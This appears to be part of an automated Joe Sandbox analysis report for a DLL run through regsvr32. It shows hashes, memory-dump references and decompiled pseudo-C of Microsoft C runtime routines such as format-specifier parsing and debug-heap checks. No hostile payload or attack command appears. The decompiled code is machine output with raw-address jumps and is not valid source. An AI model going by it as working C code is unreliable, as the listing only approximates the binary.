                                                                    • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                                                    • API String ID: 299318057-1988567080
                                                                    • Opcode ID: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                    • Instruction ID: 366f9875c4733d956d5456637ee1c03ed06e45eb4220731ed3e90847f50651e0
                                                                    • Opcode Fuzzy Hash: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                    • Instruction Fuzzy Hash: FB314D36A1874A86EBE48B59E84172E67D1F785784F614036EACD83BB4DB3FD440CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer$_realloc_dbg
                                                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                                                    • API String ID: 429494535-1858280179
                                                                    • Opcode ID: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                    • Instruction ID: 6b22acafcb165364cee05dc597c268ac6a46098997f00e2a063c2d8cfde95e66
                                                                    • Opcode Fuzzy Hash: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                    • Instruction Fuzzy Hash: D441B836619B8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: get_int64_arg
                                                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 1967237116-734865713
                                                                    • Opcode ID: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                    • Instruction ID: ca3ec57313c22d844cddba0ccc7478434e3ff2f5ac626f229199dffed11d05c2
                                                                    • Opcode Fuzzy Hash: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                    • Instruction Fuzzy Hash: 83D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6DD87AA9DB7DE440CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {
                                                                    
                                                                    				_a1412 = _a1208 & 0x0000ffff;
                                                                    				_a1412 = _a1412 - 0x41;
                                                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                    				goto __rax;
                                                                    			}



                                                                    0x7fef9d3df95
                                                                    0x7fef9d3dfa6
                                                                    0x7fef9d3dfb5
                                                                    0x7fef9d3dfdc

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 0-1585035072
                                                                    • Opcode ID: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                    • Instruction ID: 7092a431cc2f14586a5b6039053772aca43f1c1a92c9fb0ada713ca2b75f96be
                                                                    • Opcode Fuzzy Hash: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                    • Instruction Fuzzy Hash: 93B10D7260CAC286E7B1DB55E8417AFB7E0F784356F104026EAC987AA9DB7DE444CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                                                    • API String ID: 2123368286-1876092940
                                                                    • Opcode ID: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                    • Instruction ID: 5b23c079d1b4d794af0cdd69ad2b30100ea5e3abf5a9ef6833dde17c78c07454
                                                                    • Opcode Fuzzy Hash: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                    • Instruction Fuzzy Hash: 40911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CF01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {
                                                                    
                                                                    				_a972 = _a696 & 0x000000ff;
                                                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                    				goto 0xf9d3bfd9;
                                                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                    				_a1096 = _a1096 + 1;
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3beb2;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xf");
                                                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                    				goto 0xf9d3bfbe;
                                                                    				_a704 = 0;
                                                                    				goto E000007FE7FEF9D3BB66;
                                                                    				goto 0xf9d3bfd9;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a976 = _a696;
                                                                    				_a976 = _a976 - 0x41;
                                                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                    				goto __rax;
                                                                    			}



                                                                    0x7fef9d3be3a
                                                                    0x7fef9d3be49
                                                                    0x7fef9d3be53
                                                                    0x7fef9d3be61
                                                                    0x7fef9d3be6b
                                                                    0x7fef9d3be71
                                                                    0x7fef9d3be84
                                                                    0x7fef9d3be91
                                                                    0x7fef9d3be9d
                                                                    0x7fef9d3bea5
                                                                    0x7fef9d3beae
                                                                    0x7fef9d3beb2
                                                                    0x7fef9d3bebb
                                                                    0x7fef9d3bed1
                                                                    0x7fef9d3bee2
                                                                    0x7fef9d3bef0
                                                                    0x7fef9d3befc
                                                                    0x7fef9d3bf04
                                                                    0x7fef9d3bf17
                                                                    0x7fef9d3bf28
                                                                    0x7fef9d3bf36
                                                                    0x7fef9d3bf42
                                                                    0x7fef9d3bf4a
                                                                    0x7fef9d3bf5a
                                                                    0x7fef9d3bf6a
                                                                    0x7fef9d3bf7a
                                                                    0x7fef9d3bf8a
                                                                    0x7fef9d3bf9a
                                                                    0x7fef9d3bfaa
                                                                    0x7fef9d3bfac
                                                                    0x7fef9d3bfae
                                                                    0x7fef9d3bfb9
                                                                    0x7fef9d3bfbe
                                                                    0x7fef9d3bfc7
                                                                    0x7fef9d3bfcb
                                                                    0x7fef9d3bfd1
                                                                    0x7fef9d3bfe6
                                                                    0x7fef9d3bff7
                                                                    0x7fef9d3c006
                                                                    0x7fef9d3c02d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                    • API String ID: 530996419-3826063230
                                                                    • Opcode ID: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                    • Instruction ID: d6c85ddd6a9fac6d59453cfc6279b165f514207326055716b4e5bf0dd1bf0ecb
                                                                    • Opcode Fuzzy Hash: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                    • Instruction Fuzzy Hash: 0A916F72A0D6C68AE3F08B54E88477EB7E4E385342F601026D7CD87AA9CB7ED5418F11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {
                                                                    
                                                                    				_a1408 = _a1208 & 0x0000ffff;
                                                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                    				goto 0xf9d3df88;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                    				_a1544 =  &(_a1544[1]);
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3de61;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xf");
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                    				goto 0xf9d3df6d;
                                                                    				_a1216 = 0;
                                                                    				goto E000007FE7FEF9D3DC41;
                                                                    				goto 0xf9d3df88;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a1412 = _a1208 & 0x0000ffff;
                                                                    				_a1412 = _a1412 - 0x41;
                                                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                    				goto __rax;
                                                                    			}



                                                                    0x7fef9d3dde8
                                                                    0x7fef9d3ddf7
                                                                    0x7fef9d3de01
                                                                    0x7fef9d3de0f
                                                                    0x7fef9d3de19
                                                                    0x7fef9d3de1f
                                                                    0x7fef9d3de32
                                                                    0x7fef9d3de40
                                                                    0x7fef9d3de4c
                                                                    0x7fef9d3de54
                                                                    0x7fef9d3de5d
                                                                    0x7fef9d3de61
                                                                    0x7fef9d3de6a
                                                                    0x7fef9d3de80
                                                                    0x7fef9d3de91
                                                                    0x7fef9d3de9f
                                                                    0x7fef9d3deab
                                                                    0x7fef9d3deb3
                                                                    0x7fef9d3dec6
                                                                    0x7fef9d3ded7
                                                                    0x7fef9d3dee5
                                                                    0x7fef9d3def1
                                                                    0x7fef9d3def9
                                                                    0x7fef9d3df09
                                                                    0x7fef9d3df19
                                                                    0x7fef9d3df29
                                                                    0x7fef9d3df39
                                                                    0x7fef9d3df49
                                                                    0x7fef9d3df59
                                                                    0x7fef9d3df5b
                                                                    0x7fef9d3df5d
                                                                    0x7fef9d3df68
                                                                    0x7fef9d3df6d
                                                                    0x7fef9d3df76
                                                                    0x7fef9d3df7a
                                                                    0x7fef9d3df80
                                                                    0x7fef9d3df95
                                                                    0x7fef9d3dfa6
                                                                    0x7fef9d3dfb5
                                                                    0x7fef9d3dfdc

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                    • API String ID: 530996419-4206863317
                                                                    • Opcode ID: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                    • Instruction ID: 52af39986bd237b596cdecada1f5af7c0900048515ebe490badd59f4da94dd67
                                                                    • Opcode Fuzzy Hash: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                    • Instruction Fuzzy Hash: 35910A62A0C6C18AE7F08B55E88077EB3E1F385756F600026E6CD87AA4DB7ED855DF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 27%
                                                                    			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                    				void* _t171;
                                                                    				char* _t191;
                                                                    				char* _t192;
                                                                    
                                                                    				_a968 = _a696 & 0x000000ff;
                                                                    				if (_a968 == 0x20) goto 0xf9d3bd57;
                                                                    				if (_a968 == 0x23) goto 0xf9d3bd64;
                                                                    				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                                                    				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                                                    				if (_a968 == 0x30) goto 0xf9d3bd72;
                                                                    				goto 0xf9d3bd7d;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				goto 0xf9d3bd7d;
                                                                    				_a80 = _a80 | 0x00000001;
                                                                    				goto 0xf9d3bd7d;
                                                                    				_a80 = _a80 | 0x00000002;
                                                                    				goto 0xf9d3bd7d;
                                                                    				asm("bts eax, 0x7");
                                                                    				goto 0xf9d3bd7d;
                                                                    				_a80 = _a80 | 0x00000008;
                                                                    				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                                    				_t191 =  &_a1112;
                                                                    				_a88 = E000007FE7FEF9D31E40(_t191);
                                                                    				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				_a88 =  ~_a88;
                                                                    				goto 0xf9d3bdd5;
                                                                    				_a88 = _t171 + _t191 - 0x30;
                                                                    				_a116 = 0;
                                                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                    				_t192 =  &_a1112;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t192);
                                                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3be2d;
                                                                    				_a116 = _t171 + _t192 - 0x30;
                                                                    				_a972 = _a696 & 0x000000ff;
                                                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                    				goto 0xf9d3bfd9;
                                                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                    				_a1096 = _a1096 + 1;
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3beb2;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xf");
                                                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                    				goto 0xf9d3bfbe;
                                                                    				_a704 = 0;
                                                                    				goto E000007FE7FEF9D3BB66;
                                                                    				goto 0xf9d3bfd9;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a976 = _a696;
                                                                    				_a976 = _a976 - 0x41;
                                                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                    				goto __rax;
                                                                    			}






                                                                    0x7fef9d3bd02
                                                                    0x7fef9d3bd11
                                                                    0x7fef9d3bd1b
                                                                    0x7fef9d3bd25
                                                                    0x7fef9d3bd2f
                                                                    0x7fef9d3bd39
                                                                    0x7fef9d3bd3b
                                                                    0x7fef9d3bd44
                                                                    0x7fef9d3bd48
                                                                    0x7fef9d3bd51
                                                                    0x7fef9d3bd55
                                                                    0x7fef9d3bd5e
                                                                    0x7fef9d3bd62
                                                                    0x7fef9d3bd68
                                                                    0x7fef9d3bd70
                                                                    0x7fef9d3bd79
                                                                    0x7fef9d3bd8d
                                                                    0x7fef9d3bd8f
                                                                    0x7fef9d3bd9c
                                                                    0x7fef9d3bda5
                                                                    0x7fef9d3bdae
                                                                    0x7fef9d3bdb8
                                                                    0x7fef9d3bdbc
                                                                    0x7fef9d3bdd1
                                                                    0x7fef9d3bdda
                                                                    0x7fef9d3bdf2
                                                                    0x7fef9d3bdf4
                                                                    0x7fef9d3be01
                                                                    0x7fef9d3be0a
                                                                    0x7fef9d3be0c
                                                                    0x7fef9d3be14
                                                                    0x7fef9d3be29
                                                                    0x7fef9d3be3a
                                                                    0x7fef9d3be49
                                                                    0x7fef9d3be53
                                                                    0x7fef9d3be61
                                                                    0x7fef9d3be6b
                                                                    0x7fef9d3be71
                                                                    0x7fef9d3be84
                                                                    0x7fef9d3be91
                                                                    0x7fef9d3be9d
                                                                    0x7fef9d3bea5
                                                                    0x7fef9d3beae
                                                                    0x7fef9d3beb2
                                                                    0x7fef9d3bebb
                                                                    0x7fef9d3bed1
                                                                    0x7fef9d3bee2
                                                                    0x7fef9d3bef0
                                                                    0x7fef9d3befc
                                                                    0x7fef9d3bf04
                                                                    0x7fef9d3bf17
                                                                    0x7fef9d3bf28
                                                                    0x7fef9d3bf36
                                                                    0x7fef9d3bf42
                                                                    0x7fef9d3bf4a
                                                                    0x7fef9d3bf5a
                                                                    0x7fef9d3bf6a
                                                                    0x7fef9d3bf7a
                                                                    0x7fef9d3bf8a
                                                                    0x7fef9d3bf9a
                                                                    0x7fef9d3bfaa
                                                                    0x7fef9d3bfac
                                                                    0x7fef9d3bfae
                                                                    0x7fef9d3bfb9
                                                                    0x7fef9d3bfbe
                                                                    0x7fef9d3bfc7
                                                                    0x7fef9d3bfcb
                                                                    0x7fef9d3bfd1
                                                                    0x7fef9d3bfe6
                                                                    0x7fef9d3bff7
                                                                    0x7fef9d3c006
                                                                    0x7fef9d3c02d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 530996419-4087627031
                                                                    • Opcode ID: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                    • Instruction ID: f671f2f81670ff54d1d55a26610e2e3881df7bf560f190d6bc7d2e9ce8938301
                                                                    • Opcode Fuzzy Hash: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                    • Instruction Fuzzy Hash: 8B517E72A0D6C28AF3F18B64E855BBEB7E4F384345F600126D2C9869A9DB7DE540CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 27%
                                                                    			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                    				void* _t171;
                                                                    				char* _t191;
                                                                    				char* _t192;
                                                                    
                                                                    				_a1404 = _a1208 & 0x0000ffff;
                                                                    				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                                    				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                                    				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                                    				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                                    				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000001;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000002;
                                                                    				goto 0xf9d3dd2b;
                                                                    				asm("bts eax, 0x7");
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000008;
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                                    				_t191 =  &_a1560;
                                                                    				_a88 = E000007FE7FEF9D31E40(_t191);
                                                                    				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				_a88 =  ~_a88;
                                                                    				goto 0xf9d3dd83;
                                                                    				_a88 = _t171 + _t191 - 0x30;
                                                                    				_a116 = 0;
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                    				_t192 =  &_a1560;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t192);
                                                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3dddb;
                                                                    				_a116 = _t171 + _t192 - 0x30;
                                                                    				_a1408 = _a1208 & 0x0000ffff;
                                                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                    				goto 0xf9d3df88;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                    				_a1544 =  &(_a1544[1]);
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3de61;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xf");
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
